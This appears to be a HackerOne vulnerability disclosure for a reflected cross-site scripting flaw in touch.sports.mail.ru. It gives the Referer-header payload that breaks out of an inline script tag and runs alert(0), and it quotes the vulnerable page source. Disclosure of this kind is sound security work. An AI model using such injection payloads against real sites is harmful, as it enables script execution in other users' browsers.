Mail.Ru: XSS in touch.sports.mail.ru

2015-03-12T15:16:37
ID H1:51140
Type hackerone
Reporter ddworken
Modified 2015-05-21T01:20:31

Description

The XSS vulnerability is located here:

https://touch.sports.mail.ru

and is triggered by setting referer to:

ttttt</script><script>alert(0)</script><script>

The problem is that the referer is being loaded like so:

html <script> [Other Javascript Here] "httpReferer":"ttttt </script> <script> alert(0) </script> <script> ","user":"","topBanner":{"sz":9,"slot":3333},"retinaBanner":" <div class=\"ad\">\r\n<img src=\"https:\/\/rs.mail.ru\/a12327061.gif?sz=9\&rnd=931100856\&ts=1426172695\&sz=9\" style=\"width:0;height:0;position:absolute;\" alt=\"\"\/>\n<!--zg-->\r\n<\/div>"} </script>

where the relevant part is:

html <script> alert(0) </script>

I am aware that this is out of scope, but I am still reporting it since I just happened to spot it while looking for other bugs.